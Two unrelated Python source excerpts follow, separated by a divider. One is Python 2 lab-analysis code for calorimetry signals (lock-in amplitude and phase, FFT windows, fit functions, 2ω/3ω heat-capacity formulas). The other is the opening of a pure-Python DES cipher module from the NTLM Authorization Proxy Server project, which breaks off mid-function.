newro_cycles=ro_cycles[numpy.abs((ro_cycles-ro_cycles.mean()))<ro_cycles.std()]#this line does the same thing as the previous line - this is the numpy-style way. The expression inside the "[ ]" is a boolean array that is the same shape as ro_cycles and "[ ]" means index the array so numpy only returns the values at indeces where there is a True in the boolean array
if len(newro_cycles)>0 and len(newro_cycles)<len(ro_cycles):#since this is an "and" statement, the 2nd boolean will not execute if the 1st is False. We have the 1st boolean becuase if all the Ro values were "outliers" then len(newro_cycles) will be zero and we have failed to do filtering. The 2nd boolean checks if we filtered anything.
print 'Ro values from %d cycles were determined to be outliers and removed' %(len(ro_cycles)-len(newro_cycles))
return numpy.float32(newro_cycles).mean()
else:
return volts.mean()/amps.mean()
def tcr(r1, r2, t1, t2):#either all a
if isinstance(r1, numpy.ndarray) or isinstance(r2, numpy.ndarray):
if not isinstance(r1, numpy.ndarray):
r1=numpy.ones(len(r2), dtype='float32')*r1
if not isinstance(r2, numpy.ndarray):
r2=numpy.ones(len(r1), dtype='float32')*r2
ratio=numpy.float32([max(rv1, rv2)/min(rv1, rv2) for rv1, rv2 in zip(r1, r2)])
else:
ratio=max(r1, r2)/min(r1, r2)
return (ratio-1.)/numpy.abs(t2-t1)
def makearr_cyc(x, calcarr):
if isinstance(x, numpy.ndarray):
if len(x)==calcarr.shape[0]:
return x
else:
return numpy.array([x[0]]*calcarr.shape[0])
else:
return numpy.array([x]*calcarr.shape[0])
def temp_res(R, R0, T0, alpha):
print '$%^', R0
return numpy.array([(Rv/R0v-1.)/alphav+T0v for Rv, R0v, T0v, alphav in zip(R, makearr_cyc(R0, R), makearr_cyc(T0, R), makearr_cyc(alpha, R))])
def dT_IVdIdV(I, V, dI, dV, R0, alpha):
return numpy.array([(Iv*dVv-Vv*dIv)/alphav/R0v/Iv**2 for Iv, Vv, dIv, dVv, R0v, alphav in zip(I, V, dI, dV, makearr_cyc(R0, I), makearr_cyc(alpha, I))])
def D_IVdIdV(I, V, dI, dV, R0, alpha):
return numpy.array([Vv*Iv**3*R0v*alphav/(Iv*dVv-Vv*dIv) for Iv, Vv, dIv, dVv, R0v, alphav in zip(I, V, dI, dV, makearr_cyc(R0, I), makearr_cyc(alpha, I))])
def replacevalswithneighsin2nddim(arr, inds):
iall, jall=inds
for n in range(arr.shape[0]):
j=jall[iall==n]
if len(j)==0:
continue
jgood=numpy.int64([jv for jv in range(arr.shape[1]) if not jv in j])
juse=numpy.int64([jgood[numpy.argmin((jgood-jv)**2)] for jv in j])
arr[n, j]=arr[n, juse]
return arr
def replacevalswithneighs(arr, inds):
jgood=numpy.int64([jv for jv in range(arr.shape[0]) if not jv in inds])
juse=numpy.int64([jgood[numpy.argmin((jgood-jv)**2)] for jv in inds])
arr[inds]=arr[juse]
return arr
def timepartition(cycletime, timepartitionfcn='timepart_none', piecelist=[1], yvals=[]):
if timepartitionfcn=='timepart_none':
return numpy.zeros(cycletime.shape, dtype='float64')
elif timepartitionfcn=='timepart_user':
idialog=timepartDialog(None, cycletime, numpieces=len(piecelist), yvals=yvals)
idialog.exec_()
return idialog.timepart
elif timepartitionfcn=='timepart_peakid':
return numpy.zeros(cycletime.shape, dtype='float64')#not implemented yet
else:
print 'ERROR - ABOUT TO ABORT BECAUSE timepartitionfcn IS NOT VALID'
return
def sinarr(nptspercycle, npts, ph=0.):
if isinstance(npts, numpy.ndarray):
npts=len(npts)
return numpy.sin(numpy.arange(npts)*2.*numpy.pi/nptspercycle+ph)
def lia_ampphase(x, ptspercyc, ncyclewin=1., returnphase=True, pad=True, phaseshift=0.):
npts=numpy.round(ptspercyc*ncyclewin)
s=x*sinarr(ptspercyc, x, ph=phaseshift)
c=x*sinarr(ptspercyc, x, ph=numpy.pi/2.+phaseshift)
amp=(numpy.array([(numpy.fft.fft(s[i:i+npts])[0].real)**2+(numpy.fft.fft(c[i:i+npts])[0].real)**2 for i in numpy.arange(len(x)-npts)])**.5)*2./npts
if returnphase:
phase=numpy.array([numpy.arctan(numpy.fft.fft(s[i:i+npts])[0].real/numpy.fft.fft(c[i:i+npts])[0].real) for i in numpy.arange(len(x)-npts)])
if pad:
amp=numpy.concatenate([amp[:npts//2], amp, amp[-1*(len(x)-len(amp)-npts//2):]])
if returnphase:
phase=numpy.concatenate([phase[:npts//2], phase, phase[-1*(len(x)-len(phase)-npts//2):]])
if returnphase:
return amp, phase
return amp
def lia_xy(x, ptspercyc, ncyclewin=1., nptswinstartinterval=1, phaseshift=0., extrappolyorder=1, interporder=3, interpplotax=None):
npts=numpy.round(ptspercyc*ncyclewin)
s=x*sinarr(ptspercyc, x, ph=numpy.pi+phaseshift)
c=x*sinarr(ptspercyc, x, ph=numpy.pi/2.+phaseshift)
if nptswinstartinterval>1:
starti=range(0, len(x)-npts, nptswinstartinterval)
else:
starti=numpy.arange(len(x)-npts)
liax=(numpy.array([numpy.fft.fft(c[i:i+npts])[0].real for i in starti]))*2./npts
liay=(numpy.array([numpy.fft.fft(s[i:i+npts])[0].real for i in starti]))*2./npts
if nptswinstartinterval>1:
liax=interpwithinarr(starti, liax, order=interporder, interpplotax=interpplotax, interpcols=['k', 'r'])
liay=interpwithinarr(starti, liay, order=interporder, interpplotax=interpplotax, interpcols=['g', 'y'])
nptsextrap=npts//2
liax=concat_extrap_ends(liax, nptsextrap, highside=False, polyorder=extrappolyorder)
liay=concat_extrap_ends(liay, nptsextrap, highside=False, polyorder=extrappolyorder)
liax=concat_extrap_ends(liax, len(x)-len(liax), lowside=False, polyorder=extrappolyorder)
liay=concat_extrap_ends(liay, len(x)-len(liay), lowside=False, polyorder=extrappolyorder)
return liax, liay
def lia_ampphase2(x, ptspercyc, ncyclewin=1., returnphase=True, pad=True, phaseshift=0.):
npts=numpy.round(ptspercyc*ncyclewin)
s=x*sinarr(ptspercyc, x, ph=phaseshift)
c=x*sinarr(ptspercyc, x, ph=numpy.pi/2.+phaseshift)
amp=(numpy.array([(s.sum())**2+(c.sum())**2 for i in numpy.arange(len(x)-npts)])**.5)*2./npts
if returnphase:
phase=numpy.array([numpy.arctan(s.sum()/c.sum()) for i in numpy.arange(len(x)-npts)])
if pad:
amp=numpy.concatenate([amp[:npts//2], amp, amp[-1*(len(x)-len(amp)-npts//2):]])
if returnphase:
phase=numpy.concatenate([phase[:npts//2], phase, phase[-1*(len(x)-len(phase)-npts//2):]])
if returnphase:
return amp, phase
return amp
def liaharmonic_relphase(x, phaserefdata, ptspercyc, ncyclewin_1w=2., ncyclewin_nw=6., harmonic=3., phaseshift=0., pad=True):
#calculated phase is wrt a cosine reference
# x is harmonic data, harmonic = 1 is ok, phaserefdata should be same length but if it is shorter it will be padded to make length x
#ncyclewin_nw is number of harmonic cycles (as opposed to 1w cycles)
npts=numpy.round(ptspercyc*ncyclewin_1w)
s=phaserefdata*sinarr(ptspercyc, phaserefdata, ph=0)
c=phaserefdata*sinarr(ptspercyc, phaserefdata, ph=numpy.pi/2.)
ph1w=numpy.array([numpy.arctan(numpy.fft.fft(s[i:i+npts])[0]/numpy.fft.fft(c[i:i+npts])[0]) for i in numpy.arange(len(phaserefdata)-npts)])
phnw=numpy.concatenate([ph1w[:npts//2.], ph1w, ph1w[-1*(len(x)-len(ph1w)-npts//2.):]])
phnw-=phaseshift
# pylab.figure()
# pylab.plot(ph1w)
# pylab.plot(phnw)
# pylab.figure()
hptspc=ptspercyc/harmonic
nptsnw=numpy.round(hptspc*ncyclewin_nw)
s=sinarr(hptspc, x, ph=0)
c=sinarr(hptspc, x, ph=numpy.pi/2.)
# pylab.plot(numpy.array([(numpy.fft.fft(x[i:i+nptsnw]*(c[i:i+nptsnw]*numpy.cos(p)+s[i:i+nptsnw]*numpy.sin(p)))[0])**2 for i, p in zip(numpy.arange(len(x)-nptsnw), phnw[nptsnw//2:])])*4./nptsnw**2)
# pylab.plot(sfft2cfft2(x, hptspc, ncyclewin_nw), 'k--')
# pylab.show()
amp=(numpy.array([(numpy.fft.fft(x[i:i+nptsnw]*(c[i:i+nptsnw]*numpy.cos(p)+s[i:i+nptsnw]*numpy.sin(p)))[0].real)**2 for i, p in zip(numpy.arange(len(x)-nptsnw), phnw[nptsnw//2:])])**0.5)*2./nptsnw
if pad:
amp=numpy.concatenate([amp[:nptsnw//2], amp, amp[-1*(len(x)-len(amp)-nptsnw//2):]])
return amp
def windowfft_ampphase(x, npts_win, pad=True, ptspercyc=None):
symmetryfactor=2.*numpy.ones(npts_win//2+1, dtype='float64')
symmetryfactor[0]=1.
comp=numpy.array([numpy.fft.fft(x[i:i+npts_win])[:npts_win//2+1]*symmetryfactor for i in numpy.arange(len(x)-npts_win)])
amp, phase=numpy.array([[numpy.abs(c), numpy.angle(c)] for c in comp]).swapaxes(0, 1)
if pad:
amp=numpy.concatenate([amp[:npts_win//2], amp, amp[-1*(len(x)-len(amp)-npts_win//2):]])
phase=numpy.concatenate([phase[:npts_win//2], phase, phase[-1*(len(x)-len(phase)-npts_win//2):]])
return amp/npts_win, phase #frequencies are in units of daqHz and are numpy.array(range(npts_win//2+1))/npts_win.
def windowfft_xy(x, npts_win, pad=True, ptspercyc=None, nptswinstartinterval=1, extrappolyorder=1, interporder=3, interpplotax=None, freqinds=None):
if freqinds is None:
freqinds=range(npts_win//2+1)
symmetryfactor=2.*numpy.ones(len(freqinds), dtype='float64')
symmetryfactor[numpy.where(numpy.array(freqinds)==0)]=1.
if nptswinstartinterval>1:
starti=range(0, len(x)-npts_win, nptswinstartinterval)
else:
starti=numpy.arange(len(x)-npts_win)
print x.shape
comp=numpy.array([numpy.fft.fft(x[i:i+npts_win])[freqinds]*symmetryfactor for i in starti])
print comp.shape
fftx, ffty=numpy.array([[numpy.real(c), numpy.imag(c)] for c in comp]).swapaxes(0, 1).swapaxes(1, 2) #swapaxes makes X,Y first index and then frequencies and then data points like that of x
print fftx.shape
fftx/=npts_win
ffty/=npts_win
if nptswinstartinterval>1:
fftx=numpy.array([interpwithinarr(starti, a, order=interporder, interpplotax=interpplotax, interpcols=['k', 'r']) for a in fftx])
ffty=numpy.array([interpwithinarr(starti, a, order=interporder, interpplotax=interpplotax, interpcols=['g', 'y']) for a in ffty])
nptsextrap=npts_win//2
print fftx.shape
fftx=numpy.array([concat_extrap_ends(a, nptsextrap, highside=False, polyorder=extrappolyorder) for a in fftx])
print nptsextrap, fftx.shape
ffty=numpy.array([concat_extrap_ends(a, nptsextrap, highside=False, polyorder=extrappolyorder) for a in ffty])
fftx=numpy.array([concat_extrap_ends(a, len(x)-len(a), lowside=False, polyorder=extrappolyorder) for a in fftx])
print len(x), len(x)-len(a), fftx.shape
ffty=numpy.array([concat_extrap_ends(a, len(x)-len(a), lowside=False, polyorder=extrappolyorder) for a in ffty])
return fftx.T, ffty.T #frequencies are second index and are in units of daqHz and are numpy.array(range(npts_win//2+1))/npts_win, first index is same as x
def performgenericfilter(arr, filterdict):#filterdict can contains unused key:val but it must contain all those necessary for a given filter step to be performed
iterateoverlastdim=(arr.ndim>=3)
if iterateoverlastdim:
if arr.ndim>3:
origshape=arr.shape
arr=arr.reshape(origshape[:2]+(numpy.prod(origshape[2:]),))
else:
origshape=None
arrupdim=copy.copy(arr).swapaxes(1,2).swapaxes(0,1)
else:
arrupdim=numpy.array([copy.copy(arr)])
fcn_parname_fkey_eachcycle=[\
(removeoutliers_meanstd, ['nptsoneside', 'nsig', 'gapptsoneside'], ['OLnpts', 'OLnsig', 'OLgappts'], [], [], True), \
(savgolsmooth, ['nptsoneside', 'order', 'deriv'], ['SGnpts', 'SGorder', 'SGderiv'], ['binprior'], ['SGbin'], True), \
#(timeintegrate, ['integwindow_s'], ['integwindow_s'], True)\
# (timepartition, ['timepartitionfcn', 'piecelist', 'yvals'], ['timepartitionfcn', 'fitpars', 'yvals'], False)
]
for f, nl, kl, nlopt, klopt, eachcycle in fcn_parname_fkey_eachcycle:
parlist=[((not k in filterdict) or filterdict[k] is None) or (n, filterdict[k]) for n, k in zip(nl, kl)]
if True in parlist:
continue
parlist+=[(n, filterdict[k]) for n, k in zip(nlopt, klopt) if (k in filterdict and not filterdict[k] is None)]
print 'executing filter function ', f.func_name, dict(parlist)
for i in range(len(arrupdim)):
#print arrupdim[i].shape
if eachcycle:
arrupdim[i, :, :]=numpy.array([f(a, **dict(parlist)) for a in arrupdim[i]])
else:
arrupdim[i, :, :]=f(arrupdim[i], **dict(parlist))
#arr2=removeoutliers_meanstd(arr2, nptsoneside=filterdict['OLnpts'], nsig=filterdict['OLnsig'], gapptsoneside=filterdict['OLgappts'])
#savgolsmooth(arr2, nptsoneside=filterdict['SGnpts'], order=filterdict['SGorder'], deriv=filterdict['SGderiv'])
if iterateoverlastdim:
if origshape is None:
return arrupdim.swapaxes(0,1).swapaxes(1,2)
else:
return arrupdim.swapaxes(0,1).swapaxes(1,2).reshape(origshape)
else:
return arrupdim[0]
#def polyorder4_T(polycoefs, T):
# return numpy.array([polycoefs[i]*(x**i) for i in range(5)]).sum(axis=0)
#
#def T4_intdT_2pieceC(pars, T, intdT, fixedpardict={'startind_2pieceC':numpy.uint16([])}):#startind_2pieceC si the index after which pars[1] will be used as the heat capacity
# c=numpy.ones(T.shape, dtype='float64')*pars[0]
# c[fixedpardict['startind_2pieceC']:]=pars[1]
# return c+pars[2]*T**4+pars[3]*intdT
#HeatLossFunctionLibrary={\ #key:function,list of segdict keys, list of (fitpar name, dflt), dictionary of fixed parameters
# 'polyorder4_T':(polyorder4_T, ['sampletemperature'], 'a+bT+cT^2+dT^3+eT^4', [('a', 1.e-6), ('a', 1.e-8), ('a', 1.e-10), ('a', 1.e-12), ('a', 1.e-14)], None)\
# 'T4_intdT_2pieceC':(T4_intdT_2pieceC, [])
# }
#x=numpy.linspace(10., 20., 40)
#x[1]=0.
#x[18]=666.
#x[19]=66.
##x[10]=44.
#x[-1]=0.
#y=removeoutliers_meanstd(x, 6, 1.5, 2)
#print '***', x-y
def evaluatefitfcn(fitd, segd, interp_kind=1, extrap_order=1, interppars=False):#for interp_kind, see scipy.interpolate.interp1d, this is for interpolating through the excluded parts of the time axis. if interppars then only the piecewise parameters are interpolated and the function is directly evaluated with the fit parameters. if there is only 1 piece to the piecewise function, this is a roundabout way of just evlauating the fit fcn regardless of the exlcuded region
f=FitFcnLibrary[fitd['fcnname']]
pns=fitd['parnames']
ks=fitd['segdkeys']
ans=[f(**dict([('p', p)]+[(pn, segd[k][i]) for pn, k in zip(pns, ks) if pn in f.func_code.co_varnames[:f.func_code.co_argcount]])) for i, p in enumerate(fitd['fitpars'])]
pt=[segd[k] for pn, k in zip(pns, ks) if k=='cyclepartition' and pn in f.func_code.co_varnames[:f.func_code.co_argcount]]
if len(pt)==0 or numpy.all(pt[0]>=0):#if the is no paritioning in this function that was just called or if the parititoning does not exclude regions then we're done
return ans
pt=pt[0]
for i, (t, a, p) in enumerate(zip(pt, ans, fitd['fitpars'])):#iterates over cycles
iarr=numpy.int32(range(len(a)))
inds=numpy.where(t>=0.)
inds2=numpy.where((t<0.)&(iarr>inds[0][0])&(iarr<inds[0][-1]))#use interpolations in the middle
if len(inds2[0])>0:
if interppars:
fcn=scipy.interpolate.interp1d(iarr[inds], numpy.float32([p[int(round(j))] for j in t[inds]]), kind=interp_kind)
intpar=numpy.float32(fcn(iarr[inds2]))
# take fitpars, replace 0th with intpar use the args in fitfcn except make a cyclepartition that will access the 0th fitpar iteration to get the parameters needed by the fitfcn from the segd due to the intpar value change at every index, new set of fitpar and thus args for fitfcn at every array index
argtuplist_ind2=[[('p', tuple([ip]+list(p[1:])))]+[(pn, numpy.array(k=='cyclepartition' and (0,) or (segd[k][i][j],))) for pn, k in zip(pns, ks) if pn in f.func_code.co_varnames[:f.func_code.co_argcount]] for j, ip in zip(inds2[0], intpar)]
a[inds2]=numpy.float32([f(**dict(tuplist)) for tuplist in argtuplist_ind2])
else:
fcn=scipy.interpolate.interp1d(iarr[inds], a[inds], kind=interp_kind)
a[inds2]=numpy.float32(fcn(iarr[inds2]))
inds2=numpy.where((t<0.)&(iarr<inds[0][0]))
if len(inds2[0])>0:#use spline on the ends and only use as many data points as you need to extrapolate over. interpolations happen with respect to index so that it is always monotonic
if interppars:
#fcn=scipy.interpolate.UnivariateSpline(iarr[inds[0][:len(inds2[0])]], numpy.float32([p[int(round(j))] for j in t[inds[0][:len(inds2[0])]]]), k=extrap_order)
#intpar=numpy.float32(fcn(iarr[inds2]))
#Univeritae spline has a problem on 27Aug2011 that was not seen previously, so replace this extrapolation with filling in the end value of the parameter, 4 places below ($$$)
#$$$
intpar=numpy.zeros(len(inds2[0]), dtype='float32')+p[int(round(t[inds[0][0]]))]
# take fitpars, replace 0th with intpar use the args in fitfcn except make a cyclepartition that will access the 0th fitpar iteration to get the parameters needed by the fitfcn from the segd due to the intpar value change at every index, new set of fitpar and thus args for fitfcn at every array index
argtuplist_ind2=[[('p', tuple([ip]+list(p[1:])))]+[(pn, numpy.array(k=='cyclepartition' and (0,) or (segd[k][i][j],))) for pn, k in zip(pns, ks) if pn in f.func_code.co_varnames[:f.func_code.co_argcount]] for j, ip in zip(inds2[0], intpar)]
a[inds2]=numpy.float32([f(**dict(tuplist)) for tuplist in argtuplist_ind2])
else:
#fcn=scipy.interpolate.UnivariateSpline(iarr[inds[0][:len(inds2[0])]], a[inds[0][:len(inds2[0])]], k=extrap_order)
#intpar=numpy.float32(fcn(iarr[inds2]))
#$$$
intpar=numpy.zeros(len(inds2[0]), dtype='float32')+p[int(round(t[inds[0][0]]))]
a[inds2]=intpar
inds2=numpy.where((t<0.)&(iarr>inds[0][-1]))
if len(inds2[0])>0:
starti=len(inds[0])-len(inds2[0])#use only that last len inds2 indeces of the inds
starti=max(0, starti)
if interppars:
#fcn=scipy.interpolate.UnivariateSpline(iarr[inds[0][starti:]], numpy.float32([p[int(round(j))] for j in t[inds[0][starti:]]]), k=extrap_order)
#intpar=numpy.float32(fcn(iarr[inds2]))
#$$$
intpar=numpy.zeros(len(inds2[0]), dtype='float32')+p[int(round(t[inds[0][-1]]))]
# take fitpars, replace 0th with intpar use the args in fitfcn except make a cyclepartition that will access the 0th fitpar iteration to get the parameters needed by the fitfcn from the segd due to the intpar value change at every index, new set of fitpar and thus args for fitfcn at every array index
argtuplist_ind2=[[('p', tuple([ip]+list(p[1:])))]+[(pn, numpy.array(k=='cyclepartition' and (0,) or (segd[k][i][j],))) for pn, k in zip(pns, ks) if pn in f.func_code.co_varnames[:f.func_code.co_argcount]] for j, ip in zip(inds2[0], intpar)]
a[inds2]=numpy.float32([f(**dict(tuplist)) for tuplist in argtuplist_ind2])
else:
#fcn=scipy.interpolate.UnivariateSpline(iarr[inds[0][starti:]], a[inds[0][starti:]], k=extrap_order)
#intpar=numpy.float32(fcn(iarr[inds2]))
#$$$
intpar=numpy.zeros(len(inds2[0]), dtype='float32')+p[int(round(t[inds[0][-1]]))]
a[inds2]=intpar
return ans
#def piecewise(p, c):
# ans=numpy.float64([p[int(round(i))] for i in c])
# if numpy.all(c>=0):#get out as soon as possible for the instances where this is being called during a fit
# return ans
# a=numpy.where(c>=0)[0]
# b=numpy.where(c<0)[0]
# for i in b:# if in the middle of a no-fit region of a piecewiese, replaces by the average of the nearest points. if the no-fit region extends to the end, replace wit the nearest
# x=[]
# j=a[a>i]
# if len(j)>0:
# x+=[ans[j[0]]]
# j=a[a<i]
# if len(j)>0:
# x+=[ans[j[-1]]]
# ans[i]=numpy.mean(x)
# return ans
#piecewise functions are required, if don't want piecewise make sure cyclepartion conatins nothinng above. the piecewise fitpars must come first in the list and there can only be one piecewise parameter
FitFcnLibrary=dict([\
('FIT_T4', lambda p, c, T: numpy.float64([p[int(round(i))] for i in c])+numpy.array([v*(T**(i+1)) for i, v in enumerate(p[-4:])]).sum(axis=0)),\
('FIT_t4', lambda p, c, t: numpy.float64([p[int(round(i))] for i in c])+numpy.array([v*(t**(i+1)) for i, v in enumerate(p[-4:])]).sum(axis=0)),\
('FIT_t5', lambda p, c, t: numpy.float64([p[int(round(i))] for i in c])+numpy.array([v*(t**(i+1)) for i, v in enumerate(p[-5:])]).sum(axis=0)),\
('FIT_T0124', lambda p, c, T: numpy.float64([p[int(round(i))] for i in c])+numpy.array([v*(T**(i)) for i, v in zip([1, 2, 4], p[-3:])]).sum(axis=0)),\
#('pieceC_T4_intdT', lambda p, c, T, dT: numpy.float64([p[int(round(i))] for i in c])+p[-2]*T+p[-1]*dT),\
])
def calcRofromheatprogram(I1, V1, I2, V2, RoToAl, o_R2poly=1):
d={}
d['P1']=I1*V1
d['P2']=I2*V2
ff=fitfcns()
inds=numpy.where(numpy.array([I1])==0.)#array() is to make it 2-d for the replace fcn
if len(inds[0])>0:
I1=replacevalswithneighsin2nddim(numpy.array([I1]), inds)[0]
V1=replacevalswithneighsin2nddim(numpy.array([V1]), inds)[0]
inds=numpy.where(I2==0.)
if len(inds[0])>0:
I2=replacevalswithneighsin2nddim(numpy.array([I2]), inds)[0]
V2=replacevalswithneighsin2nddim(numpy.array([V2]), inds)[0]
#R1=V1/I1
R2=V2/I2
coefs=[R2[0]]+[(R2[-1]-R2[0])/len(R2)**i for i in range(1, o_R2poly+1)]
x=numpy.arange(len(R2), dtype='float64')
fcn=ff.polyfit((x, numpy.float64(R2)), coefs)
d['R2fit']=fcn(x)
R12=d['R2fit'][0]
#dR12=ff.finalparams[1]
d['delT2']=(d['R2fit'][-1]-d['R2fit'][0])/(RoToAl[0]*RoToAl[2])
# coefs=[T2[0]]+[(T2[-1]-T2[0])/len(T2)**i for i in range(1, o_T2poly+1)]
# x=numpy.arange(len(T2), dtype='float64')
# fcn=ff.polyfit((x, numpy.float64(T2)), coefs)
# d['T2fit']=fcn(x)
# delT2=d['T2fit'][-1]-d['T2fit'][0]
d['c']=d['P2'].sum()/d['delT2']
d['delT1']=(d['c']*(d['P1'].sum()))
Ro=R12/(1.+RoToAl[2]*d['delT1'])
d['calc_Ro']=Ro
return Ro, d
#Fs = 1/SAMPLINGPERIOD; % Sampling frequency
# Fsmax=250e3; %maximum sampling rate: difference between neighbor I and V
#T = 1/Fs; % Sample time
#Ttotal=(length(U)-1)*T; %total experiment time
#fq_base=Fs/POINTSPERCYCLE;
#
#phi0(j)=-angle(i1(j)); % phi0
#
#Xadd2(j)=2*abs(i1(j))*R0(j)*lam*yita(j)/6/pi/fq_base*sin(phi0(j));
#Yadd2(j)=(3*abs(i0(j))*R0(j)+4*abs(i1(j))*R0(j)*cos(phi0(j)))*lam*yita(j)/3/2/pi/fq_base;
#Fv2(j)=v2(j)-Xadd2(j)-1i*Yadd2(j)-i2(j)*R0(j);
#
#mc2(j)=lam*abs(i1(j))^2*i0(j)*R0(j)^2*3/2/abs(Fv2(j))/2/pi/fq_base;
#
#Xadd3(j)=abs(i1(j))*R0(j)*lam*yita(j)/4/2/pi/fq_base*sin(phi0(j));
#Yadd3(j)=(8*abs(i0(j))*R0(j)+9*abs(i1(j))*R0(j)*cos(phi0(j)))*lam*yita(j)/12/2/pi/fq_base;
#Fv3(j)=v3f(j)-Xadd3(j)-1i*Yadd3(j);%-i3(j)*R0(j);
#mc3(j)=lam*abs(i1(j))^3*R0(j)^2/8/abs(Fv3(j))/2/pi/fq_base;
def mCp_2w(VhX, VhY, I0X, I0Y, I1X, I1Y, IhX, IhY, dT, R, Ro, tcr, freq1w, applyVmods=True, returnall=False):
V2=VhX+1j*VhY
I1=I1X+1j*I1Y
I0amp=numpy.sqrt(I0X**2+I0Y**2)
angfreq1w=2.*numpy.pi*freq1w
if applyVmods:
I2=IhX+1j*IhY
phi0=-1.*numpy.angle(I1)
Xadd2=2.*numpy.abs(I1)*Ro*tcr*dT/3./angfreq1w*numpy.sin(phi0)
Yadd2=(3.*I0amp*Ro+4.*numpy.abs(I1)*Ro*numpy.cos(phi0))*tcr*dT/3./angfreq1w
F2=V2-Xadd2-1j*Yadd2-I2*R
else:
F2=V2
mc=tcr*numpy.abs(I1)**2*I0amp*R*Ro*1.5/numpy.abs(F2)/angfreq1w
if returnall:
if applyVmods:
return angfreq1w, phi0, I0amp, I1, I2, V2, Xadd2, Yadd2, F2, mc
else:
return angfreq1w, I0amp, I1, V2, F2, mc
else:
return mc
def mCp_3w(VhX, VhY, I0X, I0Y, I1X, I1Y, IhX, IhY, dT, R, Ro, tcr, freq1w, applyVmods=True, returnall=False):
V3=VhX+1j*VhY
I1=I1X+1j*I1Y
angfreq1w=2.*numpy.pi*freq1w
if applyVmods:
I3=IhX+1j*IhY
I0amp=numpy.sqrt(I0X**2+I0Y**2)
phi0=-1.*numpy.angle(I1)
Xadd3=numpy.abs(I1)*Ro*tcr*dT/4./angfreq1w*numpy.sin(phi0)
Yadd3=(8.*I0amp*Ro+9.*numpy.abs(I1)*Ro*numpy.cos(phi0))*tcr*dT/12./angfreq1w
F3=V3-Xadd3-1j*Yadd3-I3*R
else:
F3=V3
mc=tcr*numpy.abs(I1)**3*R*Ro/8./numpy.abs(F3)/angfreq1w
if returnall:
if applyVmods:
return angfreq1w, phi0, I0amp, I1, I3, V3, Xadd3, Yadd3, F3, mc
else:
return angfreq1w, I1, V3, F3, mc
else:
return mc
|
|
# This file is part of 'NTLM Authorization Proxy Server' http://sourceforge.net/projects/ntlmaps/
# Copyright 2001 Dmitry A. Rozmanov <dima@xenon.spb.ru>
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/> or <http://www.gnu.org/licenses/lgpl.txt>.
import six
from .U32 import U32
from .des_data import des_SPtrans, des_skb
def c2l(c):
"char[4] to unsigned long"
l = U32(c[0])
l = l | (U32(c[1]) << 8)
l = l | (U32(c[2]) << 16)
l = l | (U32(c[3]) << 24)
return l
def l2c(l):
"unsigned long to char[4]"
c = []
c.append(int(l & U32(0xFF)))
c.append(int((l >> 8) & U32(0xFF)))
c.append(int((l >> 16) & U32(0xFF)))
c.append(int((l >> 24) & U32(0xFF)))
return c
def D_ENCRYPT(tup, u, t, s):
L, R, S = tup
# print 'LRS1', L, R, S, u, t, '-->',
u = (R ^ s[S])
t = R ^ s[S + 1]
t = ((t >> 4) + (t << 28))
L = L ^ (des_SPtrans[1][int((t) & U32(0x3f))] |
des_SPtrans[3][int((t >> 8) & U32(0x3f))] |
des_SPtrans[5][int((t >> 16) & U32(0x3f))] |
des_SPtrans[7][int((t >> 24) & U32(0x3f))] |
des_SPtrans[0][int((u) & U32(0x3f))] |
des_SPtrans[2][int((u >> 8) & U32(0x3f))] |
des_SPtrans[4][int((u >> 16) & U32(0x3f))] |
des_SPtrans[6][int((u >> 24) & U32(0x3f))])
# print 'LRS:', L, R, S, u, t
return (L, R, S), u, t, s
def PERM_OP(tup, n, m):
"tup - (a, b, t)"
a, b, t = tup
t = ((a >> n) ^ b) & m
b = b ^ t
a = a ^ (t << n)
return (a, b, t)
def HPERM_OP(tup, n, m):
"tup - (a, t)"
a, t = tup
t = ((a << (16 - n)) ^ a) & m
a = a ^ t ^ (t >> (16 - n))
return a, t
shifts2 = [0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0]
class DES:
KeySched = None # des_key_schedule
def __init__(self, key_str):
self.KeySched = des_set_key(key_str)
def decrypt(self, str):
# block - UChar[]
block = []
for i in six.iterbytes(str):
block.append(i)
# print block
block = des_ecb_encrypt(block, self.KeySched, 0)
res = b''
for i in block:
res = res + six.int2byte(i)
return res
def encrypt(self, plaintext):
# block - UChar[]
block = []
for i in plaintext:
block.append(i)
block = des_ecb_encrypt(block, self.KeySched, 1)
res = b''
for i in block:
res += six.int2byte(i)
return res
def des_encript(input, ks, encrypt):
# input - U32[]
# output - U32[]
# ks - des_key_shedule - U32[2][16]
# encrypt - int
# l, r, t, u - U32
# i - int
# s - U32[]
l = input[0]
r = input[1]
t = U32(0)
u = U32(0)
r, l, t = PERM_OP((r, l, t), 4, U32(0x0f0f0f0f))
l, r, t = PERM_OP((l, r, t), 16, U32(0x0000ffff))
r, l, t = PERM_OP((r, l, t), 2, U32(0x33333333))
l, r, t = PERM_OP((l, r, t), 8, U32(0x00ff00ff))
r, l, t = PERM_OP((r, l, t), 1, U32(0x55555555))
t = (r << 1) | (r >> 31)
r = (l << 1) | (l >> 31)
l = t
s = ks # ???????????????
# print l, r
if encrypt:
for i in range(0, 32, 4):
rtup, u, t, s = D_ENCRYPT((l, r, i + 0), u, t, s)
l = rtup[0]
r = rtup[1]
rtup, u, t, s = D_ENCRYPT((r, l, i + 2), u, t, s)
r = rtup[0]
l = rtup[1]
else:
for i in range(30, 0, -4):
rtup, u, t, s = D_ENCRYPT((l, r, i - 0), u, t, s)
l = rtup[0]
r = rtup[1]
rtup, u, t, s = D_ENCRYPT((r, l, i - 2), u, t, s)
r = rtup[0]
l = rtup[1]
# print l, r
l = (l >> 1) | (l << 31)
r = (r >> 1) | (r << 31)
r, l, t = PERM_OP((r, l, t), 1, U32(0x55555555))
l, r, t = PERM_OP((l, r, t), 8, U32(0x00ff00ff))
r, l, t = PERM_OP((r, l, t), 2, U32(0x33333333))
l, r, t = PERM_OP((l, r, t), 16, U32(0x0000ffff))
r, l, t = PERM_OP((r, l, t), 4, U32(0x0f0f0f0f))
output = [l]
output.append(r)
l, r, t, u = U32(0), U32(0), U32(0), U32(0)
return output
def des_ecb_encrypt(input, ks, encrypt):
# input - des_cblock - UChar[8]
# output - des_cblock - UChar[8]
# ks - des_key_shedule - U32[2][16]
# encrypt - int
# print input
